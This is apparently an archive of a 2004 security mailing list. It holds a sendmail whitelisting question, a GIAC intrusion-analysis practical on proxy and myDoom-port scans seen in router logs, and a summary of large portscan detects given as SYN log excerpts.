From rwagner at eruces.com Thu Jul 1 15:11:10 2004
From: rwagner at eruces.com (Robert Wagner)
Date: Thu, 1 Jul 2004 10:11:10 -0500
Subject: [Intrusions] Sendmail whitelists
Message-ID:

I was wondering if anyone has come up with a good method for creating a whitelist on a sendmail gateway?

-Background:
I have been running sendmail successfully for a while. I am interested in locking down a mail gateway a bit further. Currently, mail comes in from the outside, through a gateway, then on to a final mailserver. The problem is with spam, since the gateway just looks at the domain and then relays (access file) the mail inside. If the user doesn't exist, the internal server then tries to return the mail.

I would like to create a whitelist of known email addresses, so only they get passed through. Bad email addresses are stopped/rejected at the gateway. I see how to reject bad addresses, but there is an unlimited number of these. The problem is the relay command in the access file only works for the entire domain.

Is there a simple method for doing this?

Someone mentioned:
define(`_RELAY_FULL_ADDR_', `1')
But I cannot find any information on where this will work and what exactly it does.

From jscott at rolenstarsupply.com Thu Jul 1 22:54:48 2004
From: jscott at rolenstarsupply.com (jscott at rolenstarsupply.com)
Date: Thu, 1 Jul 2004 17:54:48 -0500
Subject: [Intrusions] LOGS: GIAC GCIA Version 3.5 Practical Detect Jeremy Scott
Message-ID: <000d01c45fbe$69694c70$6501a8c0@cyborg>

Network Detect 2: Proxy scan

Jun 20 00:00:00 tcp 216.232.9.229(1422) xxx.xxx.xxx.231(3127), denied
Jun 20 00:00:06 tcp 220.99.138.166(4867) xxx.xxx.xxx.35(3127), denied
Jun 20 00:00:08 tcp 220.99.138.166(4738) xxx.xxx.xxx.37(3127), denied
Jun 20 00:00:08 icmp 217.88.124.253 xxx.xxx.xxx.221 denied
Jun 20 00:00:14 tcp 220.99.138.166(3208) xxx.xxx.xxx.35(3128), denied
Jun 20 00:00:16 tcp 216.232.9.229(1690) xxx.xxx.xxx.231(1080), denied

1. Source of Trace:
This was taken from the external router log produced on my company network. Our intrusion detection is within the external router; therefore, no other logs are available to correlate the data. The internal IP addresses have been obfuscated for security reasons.

2. Detect was generated by:
Self-observation of the external router logs pulled on a daily basis. Looking at the logs for signs of malicious behavior by hand can be tedious, but there can also be a wealth of knowledge in what is happening just outside your border. Here is a compiled example of the scan:

Access Attempts logged By MY_ROUTER
Mon Day Time     Type  Source Address (Port)   Destination Address (Port)
--- --- -------- ----  ----------------------  --------------------------
Jun 20 00:00:06 tcp 220.99.138.166(4867) xxx.xxx.xxx.35(3127), denied
Jun 20 00:00:06 tcp 220.99.138.166(4867) xxx.xxx.xxx.35(3127), denied
Jun 20 00:00:06 tcp 220.99.138.166(4867) xxx.xxx.xxx.35(3127), denied
Jun 20 00:00:22 tcp 220.99.138.166(3486) xxx.xxx.xxx.35(1080), denied
Jun 20 00:00:40 tcp 220.99.138.166(4068) xxx.xxx.xxx.36(3128), denied
Jun 20 00:01:01 tcp 220.99.138.166(4738) xxx.xxx.xxx.37(3127), denied
Jun 20 00:01:28 tcp 220.99.138.166(3825) xxx.xxx.xxx.40(3128), denied
Jun 20 00:01:36 tcp 220.99.138.166(4105) xxx.xxx.xxx.40(1080), denied
Jun 20 00:01:44 tcp 220.99.138.166(4382) xxx.xxx.xxx.41(3127), denied
Jun 20 00:01:52 tcp 220.99.138.166(4869) xxx.xxx.xxx.41(3128), denied
Jun 20 00:01:58 tcp 220.99.138.166(3825) xxx.xxx.xxx.40(3128), denied
Jun 20 00:02:04 tcp 220.99.138.166(4105) xxx.xxx.xxx.40(1080), denied
Jun 20 00:02:24 tcp 220.99.138.166(3209) xxx.xxx.xxx.41(1080), denied
Jun 20 00:02:40 tcp 220.99.138.166(3507) xxx.xxx.xxx.42(3127), denied
Jun 20 00:02:53 tcp 220.99.138.166(4053) xxx.xxx.xxx.42(1080), denied
Jun 20 00:03:02 tcp 220.99.138.166(4326) xxx.xxx.xxx.43(3127), denied
Jun 20 00:03:04 tcp 220.99.138.166(3698) xxx.xxx.xxx.44(3128), denied
Jun 20 00:03:11 tcp 220.99.138.166(4727) xxx.xxx.xxx.43(3128), denied
Jun 20 00:03:16 tcp 220.99.138.166(3427) xxx.xxx.xxx.44(3127), denied
Jun 20 00:03:28 tcp 220.99.138.166(3698) xxx.xxx.xxx.44(3128), denied
Jun 20 00:03:33 tcp 220.99.138.166(3970) xxx.xxx.xxx.44(1080), denied
Jun 20 00:03:52 tcp 220.99.138.166(4247) xxx.xxx.xxx.45(3127), denied
Jun 20 00:04:00 tcp 220.99.138.166(4629) xxx.xxx.xxx.45(3128), denied
Jun 20 00:04:17 tcp 220.99.138.166(3345) xxx.xxx.xxx.46(3127), denied
Jun 20 00:04:30 tcp 220.99.138.166(3902) xxx.xxx.xxx.46(1080), denied
Jun 20 00:04:37 tcp 220.99.138.166(4176) xxx.xxx.xxx.47(3127), denied
Jun 20 00:04:48 tcp 220.99.138.166(4969) xxx.xxx.xxx.47(1080), denied
Jun 20 00:05:04 tcp 220.99.138.166(3554) xxx.xxx.xxx.48(3128), denied

3. Probability the source address was spoofed:
Since there were no other logs to correlate the data to, I can't tell if the packets have any signs of crafting. However, because of the ports that are being scanned, the source address is probably real.

Source Address - The source address is 220.99.138.166. If you do a whois on the IP address, you will be returned with the following information from APNIC.

% [whois.apnic.net node-1]
% Whois data copyright terms    http://www.apnic.net/db/dbcopyright.html

inetnum:      220.96.0.0 - 220.99.255.255
netname:      OCN-JPNIC-JP
descr:        OCN Provided By NTT-Communications which is ISP
descr:        in Chiyoda-ku, Tokyo, Japan
country:      JP
admin-c:      JNIC1-AP
tech-c:       JNIC1-AP
remarks:      ************************************************
remarks:      Allocated to JPNIC member. Authoritative
remarks:      information regarding assignments and allocation
remarks:      made from within this block can also be queried
remarks:      at whois.nic.ad.jp. To obtain an English output
remarks:      query whois -h whois.nic.ad.jp x.x.x.x/e
remarks:      Email address for spam or abuse complaints : abuse at ocn.ad.jp
remarks:      ************************************************
mnt-by:       MAINT-JPNIC
mnt-lower:    MAINT-JPNIC
changed:      hm-changed at apnic.net 20020904
changed:      ip-apnic at nic.ad.jp 20040413
status:       ALLOCATED PORTABLE
source:       APNIC

role:         Japan Network Information Center
address:      Kokusai-Kougyou-Kanda Bldg 6F, 2-3-4 Uchi-Kanda
address:      Chiyoda-ku, Tokyo 101-0047, Japan
country:      JP
phone:        +81-3-5297-2311
fax-no:       +81-3-5297-2312
e-mail:       hostmaster at nic.ad.jp
admin-c:      SS13-AP
tech-c:       SY7-AP
nic-hdl:      JNIC1-AP
mnt-by:       MAINT-JPNIC
changed:      apnic-ftp at nic.ad.jp 19990629
changed:      ip-staff at nic.ad.jp 20030806
source:       APNIC

inetnum:      220.99.128.0 - 220.99.255.255
netname:      PLALA
descr:        Plala Networks Inc.
country:      JP
admin-c:      MN2905JP
tech-c:       HS3694JP
remarks:      This information has been partially mirrored by APNIC from
remarks:      JPNIC. To obtain more specific information, please use the
remarks:      JPNIC whois server at whois.nic.ad.jp. (This defaults to
remarks:      Japanese output, use the /e switch for English output)
changed:      apnic-ftp at nic.ad.jp 20030203
remarks:      This information has been partially mirrored by APNIC from
remarks:      JPNIC. To obtain more specific information, please use the
remarks:      JPNIC whois server at whois.nic.ad.jp. (This defaults to
remarks:      Japanese output, use the /e switch for English output)
changed:      apnic-ftp at nic.ad.jp 20040609
source:       JPNIC

The fact that it is a valid IP address according to APNIC, and that the ports being probed may return some type of response to allow the hacker to gain access to the system, leads me to believe that the IP address is not spoofed.

4. Description of attack:
The attack is obviously a scan for SOCKS and Squid proxies in an attempt to locate a compromised system or one that is running the service, to exploit possible vulnerabilities within the service.
A CVE that covers the Squid proxy vulnerability can be found at the following URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0068
A CAN, which is under review at this time, that covers the SOCKS proxy vulnerability can be found at the following URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0315
Along with the proxies, the attacker appears to be probing for port 3127. This port is left open as a back door by the myDoom virus[1], which could be an avenue for a denial-of-service attack in the future, according to CERT at http://www.cert.org/incident_notes/IN-2004-01.html.

5. Attack mechanism:
The attacker is probing the network in search of responding ports. Since there are no other logs to correlate with, I can only assume that the TCP packets that are being sent are to elicit some response to find a listening or compromised host. For example, the attacker sends an unsolicited TCP packet with the ACK flag set. The normal response would be for the host to respond back with RST. If that is indeed the case, the attacker now knows that: 1) the host is alive and listening, and 2) there is no filtering in place. If the attacker receives no response, then he can assume: 1) some type of filtering is in place, or 2) that the host is not alive. If the attacker receives the response that is being solicited, then he can attempt to exploit the vulnerabilities with a buffer overflow using specially crafted packets. In the case of the back door left by the myDoom virus, the attacker could possibly take control of that system to launch a denial-of-service attack.

6. Correlations:
I found a posting at http://lists.sans.org/pipermail/unisog/2004-March/006955.php that states that they had seen some scans, particularly on the weekends, just a couple of months back. I was unable to see any other postings to correlate my findings.

7. Evidence of active targeting:
It appears to be targeted in the sense that it is targeting three specific ports as possible back doors to compromised systems. Also, the attacker is scanning the full range of addresses on this particular subnet. The scans are not rapid in succession but fairly consistent.

8. Severity:
severity = (criticality + lethality) - (system countermeasures + network countermeasures)
Each value is ranked on a scale from 1 (lowest) to 5 (highest).

Criticality: 2
I believe that criticality is low based on the fact that we do not run SOCKS or Squid proxies on our network. It is possible that the myDoom virus could be introduced, but active virus scanning with updated definitions is in use.

Lethality: 3
I do not think that this scan in itself is very lethal, but given the nature of business on my network, a compromise could be very lethal. Continued monitoring of this type of scan and any other associated IP addresses should be considered.

System countermeasures: 2
The systems on this network are patched and updated regularly or as updates become available. The systems administrators do a fair job of ensuring that the systems are secure and up to date.

Network countermeasures: 3
I am happy to say that this scan was denied at the border router. The network currently uses a defense-in-depth approach. Inside the border router, which uses extensive ACLs, traffic is monitored by a network IDS. A firewall is then in place that all traffic to the internal network is routed through. The internal network is monitored by multiple network IDS on various segments along with Cisco IDS modules in the switches. Correlation with various agencies allows us to put preventative measures up at the border ahead of time.

9. Defensive Recommendations:
The border router should be configured to block incoming requests for services that are not in use or are vulnerable to remote access. If the scan is coming from a specific host, then that IP address can be blocked at the router.
Firewalls should also be set to block any unused services. Since the scan also includes the port commonly associated with the myDoom virus, a full system scan with updated definitions should be done on all systems to ensure that none of the systems have been compromised.

10. Multiple choice test question:
What range of ports does the myDoom virus open up and listen on?
a. 4200-4000
b. 3127-3198
c. 1024-1029
d. 135-139

Answer: b. A system that has been compromised by the myDoom virus opens ports 3127-3198, according to CERT http://www.cert.org/incident_notes/IN-2004-01.html.

--------------------------------------------------------------------------------
[1] LinkLogger

From Ken.Connelly at uni.edu Thu Jul 1 19:07:45 2004
From: Ken.Connelly at uni.edu (Ken.Connelly at uni.edu)
Date: Thu, 01 Jul 2004 14:07:45 -0500 (CDT)
Subject: [Intrusions] [LOGS] Summary of large-scale portscanning detects
Message-ID: <01LBY7AKXD908YCRLC@uni.edu>

The following extracts show the beginning and ending of scan activity that was detected on my network. The number following each set is the total number of probes for that source. Timestamps are GMT-0500.

Jun 30 05:56:44 82.66.34.37:22002 -> xxx.yyy.1.0:3127 SYN ******S*
Jun 30 05:56:44 82.66.34.37:22002 -> xxx.yyy.1.0:1080 SYN ******S*
Jun 30 05:56:44 82.66.34.37:22002 -> xxx.yyy.1.0:10080 SYN ******S*
Jun 30 05:56:44 82.66.34.37:22002 -> xxx.yyy.1.0:3128 SYN ******S*
Jun 30 05:56:44 82.66.34.37:22002 -> xxx.yyy.1.1:3127 SYN ******S*
Jun 30 05:56:44 82.66.34.37:22002 -> xxx.yyy.1.1:1080 SYN ******S*
Jun 30 05:56:45 82.66.34.37:22002 -> xxx.yyy.1.1:10080 SYN ******S*
Jun 30 05:56:45 82.66.34.37:22002 -> xxx.yyy.1.1:3128 SYN ******S*
[...]
Jun 30 12:41:43 82.66.34.37:22002 -> xxx.yyy.221.193:3128 SYN ******S*
Jun 30 12:41:43 82.66.34.37:22002 -> xxx.yyy.221.194:3127 SYN ******S*
Jun 30 12:41:43 82.66.34.37:22002 -> xxx.yyy.221.194:1080 SYN ******S*
Jun 30 12:41:43 82.66.34.37:22002 -> xxx.yyy.221.194:10080 SYN ******S*
Jun 30 12:41:43 82.66.34.37:22002 -> xxx.yyy.221.194:3128 SYN ******S*
Jun 30 12:41:43 82.66.34.37:22002 -> xxx.yyy.221.195:3127 SYN ******S*
Jun 30 12:41:44 82.66.34.37:22002 -> xxx.yyy.221.195:1080 SYN ******S*
Jun 30 12:41:44 82.66.34.37:22002 -> xxx.yyy.221.195:10080 SYN ******S*
Jun 30 12:41:45 82.66.34.37:22002 -> xxx.yyy.221.195:3128 SYN ******S*
138896

Jun 30 13:26:13 82.36.61.4:2305 -> xxx.yyy.1.0:1433 SYN ******S*
Jun 30 13:26:13 82.36.61.4:2309 -> xxx.yyy.1.1:1433 SYN ******S*
Jun 30 13:26:10 82.36.61.4:2311 -> xxx.yyy.1.2:1433 SYN ******S*
Jun 30 13:26:13 82.36.61.4:2314 -> xxx.yyy.1.3:1433 SYN ******S*
Jun 30 13:26:13 82.36.61.4:2316 -> xxx.yyy.1.4:1433 SYN ******S*
Jun 30 13:26:13 82.36.61.4:2317 -> xxx.yyy.1.5:1433 SYN ******S*
Jun 30 13:26:13 82.36.61.4:2319 -> xxx.yyy.1.6:1433 SYN ******S*
Jun 30 13:26:13 82.36.61.4:2323 -> xxx.yyy.1.7:1433 SYN ******S*
[...]
Jun 30 17:15:18 82.36.61.4:1637 -> xxx.yyy.255.249:1433 SYN ******S*
Jun 30 17:15:18 82.36.61.4:1649 -> xxx.yyy.255.250:1433 SYN ******S*
Jun 30 17:15:18 82.36.61.4:1626 -> xxx.yyy.255.248:1433 SYN ******S*
Jun 30 17:15:18 82.36.61.4:1629 -> xxx.yyy.255.247:1433 SYN ******S*
Jun 30 17:15:19 82.36.61.4:1689 -> xxx.yyy.255.251:1433 SYN ******S*
Jun 30 17:15:20 82.36.61.4:1814 -> xxx.yyy.255.252:1433 SYN ******S*
Jun 30 17:15:20 82.36.61.4:1866 -> xxx.yyy.255.253:1433 SYN ******S*
Jun 30 17:15:20 82.36.61.4:1875 -> xxx.yyy.255.254:1433 SYN ******S*
119023

Jun 30 14:38:30 218.64.88.131:4630 -> xxx.yyy.1.0:139 SYN ******S*
Jun 30 14:38:30 218.64.88.131:4634 -> xxx.yyy.1.2:139 SYN ******S*
Jun 30 14:38:27 218.64.88.131:4635 -> xxx.yyy.1.3:139 SYN ******S*
Jun 30 14:38:30 218.64.88.131:4636 -> xxx.yyy.1.4:139 SYN ******S*
Jun 30 14:38:30 218.64.88.131:4637 -> xxx.yyy.1.5:139 SYN ******S*
Jun 30 14:38:30 218.64.88.131:4638 -> xxx.yyy.1.6:139 SYN ******S*
Jun 30 14:38:30 218.64.88.131:4639 -> xxx.yyy.1.7:139 SYN ******S*
Jun 30 14:38:30 218.64.88.131:4640 -> xxx.yyy.1.8:139 SYN ******S*
[...]
Jun 30 15:02:57 218.64.88.131:2504 -> xxx.yyy.255.246:139 SYN ******S*
Jun 30 15:02:57 218.64.88.131:2505 -> xxx.yyy.255.247:139 SYN ******S*
Jun 30 15:02:57 218.64.88.131:2509 -> xxx.yyy.255.249:139 SYN ******S*
Jun 30 15:02:57 218.64.88.131:2510 -> xxx.yyy.255.250:139 SYN ******S*
Jun 30 15:02:57 218.64.88.131:2506 -> xxx.yyy.255.248:139 SYN ******S*
Jun 30 15:02:57 218.64.88.131:2514 -> xxx.yyy.255.254:139 SYN ******S*
Jun 30 15:02:57 218.64.88.131:2513 -> xxx.yyy.255.253:139 SYN ******S*
Jun 30 15:02:57 218.64.88.131:2511 -> xxx.yyy.255.251:139 SYN ******S*
102359

Jun 30 20:24:55 195.120.208.35:1672 -> xxx.yyy.1.1:8000 SYN ******S*
Jun 30 20:24:55 195.120.208.35:1673 -> xxx.yyy.1.2:8000 SYN ******S*
Jun 30 20:24:55 195.120.208.35:1674 -> xxx.yyy.1.3:8000 SYN ******S*
Jun 30 20:24:56 195.120.208.35:1675 -> xxx.yyy.1.4:8000 SYN ******S*
Jun 30 20:24:56 195.120.208.35:1676 -> xxx.yyy.1.5:8000 SYN ******S*
Jun 30 20:24:56 195.120.208.35:1678 -> xxx.yyy.1.7:8000 SYN ******S*
Jun 30 20:24:56 195.120.208.35:1677 -> xxx.yyy.1.6:8000 SYN ******S*
Jun 30 20:24:56 195.120.208.35:1679 -> xxx.yyy.1.8:8000 SYN ******S*
[...]
Jun 30 20:32:35 195.120.208.35:4588 -> xxx.yyy.255.234:8000 SYN ******S*
Jun 30 20:32:35 195.120.208.35:4598 -> xxx.yyy.255.244:8000 SYN ******S*
Jun 30 20:32:35 195.120.208.35:4595 -> xxx.yyy.255.241:8000 SYN ******S*
Jun 30 20:32:35 195.120.208.35:4602 -> xxx.yyy.255.247:8000 SYN ******S*
Jun 30 20:32:35 195.120.208.35:4585 -> xxx.yyy.255.231:8000 SYN ******S*
Jun 30 20:32:35 195.120.208.35:4579 -> xxx.yyy.255.225:8000 SYN ******S*
Jun 30 20:32:35 195.120.208.35:4576 -> xxx.yyy.255.222:8000 SYN ******S*
Jun 30 20:32:35 195.120.208.35:4592 -> xxx.yyy.255.238:8000 SYN ******S*
74859

Jun 30 19:29:37 171.64.128.185:3714 -> xxx.yyy.1.1:1433 SYN ******S*
Jun 30 19:29:37 171.64.128.185:3715 -> xxx.yyy.1.2:1433 SYN ******S*
Jun 30 19:29:37 171.64.128.185:3716 -> xxx.yyy.1.3:1433 SYN ******S*
Jun 30 19:29:37 171.64.128.185:3717 -> xxx.yyy.1.4:1433 SYN ******S*
Jun 30 19:29:34 171.64.128.185:3720 -> xxx.yyy.1.5:1433 SYN ******S*
Jun 30 19:29:37 171.64.128.185:3724 -> xxx.yyy.1.7:1433 SYN ******S*
Jun 30 19:29:37 171.64.128.185:3725 -> xxx.yyy.1.8:1433 SYN ******S*
Jun 30 19:29:37 171.64.128.185:3728 -> xxx.yyy.1.9:1433 SYN ******S*
[...]
Jun 30 19:41:18 171.64.128.185:3640 -> xxx.yyy.255.248:1433 SYN ******S*
Jun 30 19:41:18 171.64.128.185:3629 -> xxx.yyy.255.243:1433 SYN ******S*
Jun 30 19:41:18 171.64.128.185:3636 -> xxx.yyy.255.246:1433 SYN ******S*
Jun 30 19:41:18 171.64.128.185:3627 -> xxx.yyy.255.241:1433 SYN ******S*
Jun 30 19:41:18 171.64.128.185:3651 -> xxx.yyy.255.253:1433 SYN ******S*
Jun 30 19:41:18 171.64.128.185:3645 -> xxx.yyy.255.251:1433 SYN ******S*
Jun 30 19:41:18 171.64.128.185:3652 -> xxx.yyy.255.254:1433 SYN ******S*
Jun 30 19:41:18 171.64.128.185:3646 -> xxx.yyy.255.252:1433 SYN ******S*
71312

Jun 30 14:31:50 218.162.51.8:3359 -> xxx.yyy.1.1:8000 SYN ******S*
Jun 30 14:31:49 218.162.51.8:3360 -> xxx.yyy.1.2:8000 SYN ******S*
Jun 30 14:31:50 218.162.51.8:3361 -> xxx.yyy.1.3:8000 SYN ******S*
Jun 30 14:31:51 218.162.51.8:3363 -> xxx.yyy.1.4:8000 SYN ******S*
Jun 30 14:31:48 218.162.51.8:3368 -> xxx.yyy.1.8:8000 SYN ******S*
Jun 30 14:31:48 218.162.51.8:3369 -> xxx.yyy.1.9:8000 SYN ******S*
Jun 30 14:31:49 218.162.51.8:3376 -> xxx.yyy.1.12:8000 SYN ******S*
Jun 30 14:31:50 218.162.51.8:3378 -> xxx.yyy.1.13:8000 SYN ******S*
[...]
Jun 30 14:54:12 218.162.51.8:3825 -> xxx.yyy.255.244:8000 SYN ******S*
Jun 30 14:54:12 218.162.51.8:3827 -> xxx.yyy.255.245:8000 SYN ******S*
Jun 30 14:54:12 218.162.51.8:3828 -> xxx.yyy.255.246:8000 SYN ******S*
Jun 30 14:54:12 218.162.51.8:3832 -> xxx.yyy.255.249:8000 SYN ******S*
Jun 30 14:54:12 218.162.51.8:3835 -> xxx.yyy.255.250:8000 SYN ******S*
Jun 30 14:54:12 218.162.51.8:3840 -> xxx.yyy.255.252:8000 SYN ******S*
Jun 30 14:54:12 218.162.51.8:3844 -> xxx.yyy.255.253:8000 SYN ******S*
Jun 30 14:54:12 218.162.51.8:3845 -> xxx.yyy.255.254:8000 SYN ******S*
70673

Jun 30 14:25:17 195.184.244.66:4652 -> xxx.yyy.1.1:8000 SYN ******S*
Jun 30 14:25:17 195.184.244.66:4653 -> xxx.yyy.1.2:8000 SYN ******S*
Jun 30 14:25:17 195.184.244.66:4654 -> xxx.yyy.1.3:8000 SYN ******S*
Jun 30 14:25:18 195.184.244.66:4655 -> xxx.yyy.1.4:8000 SYN ******S*
Jun 30 14:25:18 195.184.244.66:4656 -> xxx.yyy.1.5:8000 SYN ******S*
Jun 30 14:25:15 195.184.244.66:4657 -> xxx.yyy.1.6:8000 SYN ******S*
Jun 30 14:25:18 195.184.244.66:4658 -> xxx.yyy.1.7:8000 SYN ******S*
Jun 30 14:25:18 195.184.244.66:4659 -> xxx.yyy.1.8:8000 SYN ******S*
[...]
Jun 30 14:36:21 195.184.244.66:3282 -> xxx.yyy.255.245:8000 SYN ******S*
Jun 30 14:36:21 195.184.244.66:3286 -> xxx.yyy.255.249:8000 SYN ******S*
Jun 30 14:36:21 195.184.244.66:3283 -> xxx.yyy.255.246:8000 SYN ******S*
Jun 30 14:36:21 195.184.244.66:3287 -> xxx.yyy.255.250:8000 SYN ******S*
Jun 30 14:36:21 195.184.244.66:3279 -> xxx.yyy.255.242:8000 SYN ******S*
Jun 30 14:36:21 195.184.244.66:3289 -> xxx.yyy.255.252:8000 SYN ******S*
Jun 30 14:36:21 195.184.244.66:3290 -> xxx.yyy.255.253:8000 SYN ******S*
Jun 30 14:36:21 195.184.244.66:3291 -> xxx.yyy.255.254:8000 SYN ******S*
69700

Jun 30 13:10:28 211.220.191.241:3221 -> xxx.yyy.1.1:1433 SYN ******S*
Jun 30 13:10:25 211.220.191.241:3223 -> xxx.yyy.1.3:1433 SYN ******S*
Jun 30 13:10:28 211.220.191.241:3222 -> xxx.yyy.1.2:1433 SYN ******S*
Jun 30 13:10:28 211.220.191.241:3224 -> xxx.yyy.1.4:1433 SYN ******S*
Jun 30 13:10:28 211.220.191.241:3225 -> xxx.yyy.1.5:1433 SYN ******S*
Jun 30 13:10:28 211.220.191.241:3226 -> xxx.yyy.1.6:1433 SYN ******S*
Jun 30 13:10:28 211.220.191.241:3227 -> xxx.yyy.1.7:1433 SYN ******S*
Jun 30 13:10:28 211.220.191.241:3228 -> xxx.yyy.1.8:1433 SYN ******S*
[...]
Jun 30 13:22:07 211.220.191.241:1863 -> xxx.yyy.255.242:1433 SYN ******S*
Jun 30 13:22:07 211.220.191.241:1864 -> xxx.yyy.255.243:1433 SYN ******S*
Jun 30 13:22:07 211.220.191.241:1862 -> xxx.yyy.255.241:1433 SYN ******S*
Jun 30 13:22:07 211.220.191.241:1859 -> xxx.yyy.255.238:1433 SYN ******S*
Jun 30 13:22:07 211.220.191.241:1868 -> xxx.yyy.255.247:1433 SYN ******S*
Jun 30 13:22:07 211.220.191.241:1872 -> xxx.yyy.255.251:1433 SYN ******S*
Jun 30 13:22:07 211.220.191.241:1873 -> xxx.yyy.255.252:1433 SYN ******S*
Jun 30 13:22:07 211.220.191.241:1870 -> xxx.yyy.255.249:1433 SYN ******S*
Jun 30 13:22:07 211.220.191.241:1869 -> xxx.yyy.255.248:1433 SYN ******S*
67746

Jun 30 14:52:24 198.151.149.49:3671 -> xxx.yyy.1.1:7575 SYN ******S*
Jun 30 14:52:24 198.151.149.49:3672 -> xxx.yyy.1.2:7575 SYN ******S*
Jun 30 14:52:24 198.151.149.49:3673 -> xxx.yyy.1.3:7575 SYN ******S*
Jun 30 14:52:26 198.151.149.49:3674 -> xxx.yyy.1.4:7575 SYN ******S*
Jun 30 14:52:26 198.151.149.49:3675 -> xxx.yyy.1.5:7575 SYN ******S*
Jun 30 14:52:26 198.151.149.49:3676 -> xxx.yyy.1.6:7575 SYN ******S*
Jun 30 14:52:26 198.151.149.49:3677 -> xxx.yyy.1.7:7575 SYN ******S*
Jun 30 14:52:26 198.151.149.49:3678 -> xxx.yyy.1.8:7575 SYN ******S*
[...]
Jun 30 15:04:05 198.151.149.49:2477 -> xxx.yyy.255.241:7575 SYN ******S*
Jun 30 15:04:05 198.151.149.49:2489 -> xxx.yyy.255.253:7575 SYN ******S*
Jun 30 15:04:05 198.151.149.49:2487 -> xxx.yyy.255.251:7575 SYN ******S*
Jun 30 15:04:05 198.151.149.49:2486 -> xxx.yyy.255.250:7575 SYN ******S*
Jun 30 15:04:05 198.151.149.49:2484 -> xxx.yyy.255.248:7575 SYN ******S*
Jun 30 15:04:05 198.151.149.49:2483 -> xxx.yyy.255.247:7575 SYN ******S*
Jun 30 15:04:05 198.151.149.49:2488 -> xxx.yyy.255.252:7575 SYN ******S*
Jun 30 15:04:05 198.151.149.49:2485 -> xxx.yyy.255.249:7575 SYN ******S*
66270

Jun 30 22:30:14 212.12.244.130:2830 -> xxx.yyy.1.2:1433 SYN ******S*
Jun 30 22:30:17 212.12.244.130:2832 -> xxx.yyy.1.4:1433 SYN ******S*
Jun 30 22:30:14 212.12.244.130:2833 -> xxx.yyy.1.5:1433 SYN ******S*
Jun 30 22:30:17 212.12.244.130:2835 -> xxx.yyy.1.7:1433 SYN ******S*
Jun 30 22:30:17 212.12.244.130:2836 -> xxx.yyy.1.8:1433 SYN ******S*
Jun 30 22:30:17 212.12.244.130:2837 -> xxx.yyy.1.9:1433 SYN ******S*
Jun 30 22:30:17 212.12.244.130:2838 -> xxx.yyy.1.10:1433 SYN ******S*
Jun 30 22:30:17 212.12.244.130:2839 -> xxx.yyy.1.11:1433 SYN ******S*
[...]
Jun 30 22:41:36 212.12.244.130:1652 -> xxx.yyy.255.241:1433 SYN ******S*
Jun 30 22:41:36 212.12.244.130:1653 -> xxx.yyy.255.242:1433 SYN ******S*
Jun 30 22:41:36 212.12.244.130:1664 -> xxx.yyy.255.253:1433 SYN ******S*
Jun 30 22:41:36 212.12.244.130:1660 -> xxx.yyy.255.249:1433 SYN ******S*
Jun 30 22:41:36 212.12.244.130:1665 -> xxx.yyy.255.254:1433 SYN ******S*
Jun 30 22:41:36 212.12.244.130:1662 -> xxx.yyy.255.251:1433 SYN ******S*
Jun 30 22:41:36 212.12.244.130:1663 -> xxx.yyy.255.252:1433 SYN ******S*
Jun 30 22:41:36 212.12.244.130:1661 -> xxx.yyy.255.250:1433 SYN ******S*
60069

Jun 30 06:06:57 218.34.88.4:1762 -> xxx.yyy.1.0:1433 SYN ******S*
Jun 30 06:06:57 218.34.88.4:1763 -> xxx.yyy.1.1:1433 SYN ******S*
Jun 30 06:06:57 218.34.88.4:1764 -> xxx.yyy.1.2:1433 SYN ******S*
Jun 30 06:06:57 218.34.88.4:1765 -> xxx.yyy.1.3:1433 SYN ******S*
Jun 30 06:06:57 218.34.88.4:1766 -> xxx.yyy.1.4:1433 SYN ******S*
Jun 30 06:06:57 218.34.88.4:1767 -> xxx.yyy.1.5:1433 SYN ******S*
Jun 30 06:06:57 218.34.88.4:1769 -> xxx.yyy.1.6:1433 SYN ******S*
Jun 30 06:06:54 218.34.88.4:1772 -> xxx.yyy.1.7:1433 SYN ******S*
[...]
Jun 30 08:24:28 218.34.88.4:4987 -> xxx.yyy.154.73:1433 SYN ******S*
Jun 30 08:24:28 218.34.88.4:4991 -> xxx.yyy.154.76:1433 SYN ******S*
Jun 30 08:24:28 218.34.88.4:1265 -> xxx.yyy.154.85:1433 SYN ******S*
Jun 30 08:24:28 218.34.88.4:4994 -> xxx.yyy.154.77:1433 SYN ******S*
Jun 30 08:24:28 218.34.88.4:1270 -> xxx.yyy.154.86:1433 SYN ******S*
Jun 30 08:24:28 218.34.88.4:1026 -> xxx.yyy.154.79:1433 SYN ******S*
Jun 30 08:24:28 218.34.88.4:4999 -> xxx.yyy.154.78:1433 SYN ******S*
Jun 30 08:24:28 218.34.88.4:1271 -> xxx.yyy.154.87:1433 SYN ******S*
Jun 30 08:24:29 218.34.88.4:1274 -> xxx.yyy.154.89:1433 SYN ******S*
49836

Jun 30 00:02:27 61.152.121.249:10616 -> xxx.yyy.128.5:25 SYN ******S*
Jun 30 00:02:27 61.152.121.249:10617 -> xxx.yyy.128.6:25 SYN ******S*
Jun 30 00:02:28 61.152.121.249:10851 -> xxx.yyy.128.7:25 SYN ******S*
Jun 30 00:02:31 61.152.121.249:11173 -> xxx.yyy.128.10:25 SYN ******S*
Jun 30 00:02:28 61.152.121.249:11257 -> xxx.yyy.128.18:25 SYN ******S*
Jun 30 00:02:31 61.152.121.249:11260 -> xxx.yyy.128.19:25 SYN ******S*
Jun 30 00:02:28 61.152.121.249:11261 -> xxx.yyy.128.15:25 SYN ******S*
Jun 30 00:02:28 61.152.121.249:11269 -> xxx.yyy.128.20:25 SYN ******S*
[...]
Jun 30 00:47:20 61.152.121.249:37377 -> xxx.yyy.255.232:25 SYN ******S*
Jun 30 00:47:20 61.152.121.249:37374 -> xxx.yyy.255.233:25 SYN ******S*
Jun 30 00:47:20 61.152.121.249:37383 -> xxx.yyy.255.237:25 SYN ******S*
Jun 30 00:47:20 61.152.121.249:37415 -> xxx.yyy.255.242:25 SYN ******S*
Jun 30 00:47:20 61.152.121.249:37405 -> xxx.yyy.255.241:25 SYN ******S*
Jun 30 00:47:20 61.152.121.249:37432 -> xxx.yyy.255.244:25 SYN ******S*
Jun 30 00:47:20 61.152.121.249:37483 -> xxx.yyy.255.251:25 SYN ******S*
Jun 30 00:47:20 61.152.121.249:37489 -> xxx.yyy.255.253:25 SYN ******S*
Jun 30 00:47:20 61.152.121.249:37501 -> xxx.yyy.255.254:25 SYN ******S*
46487

Jun 30 10:29:47 81.84.204.39:3357 -> xxx.yyy.1.0:455 SYN ******S*
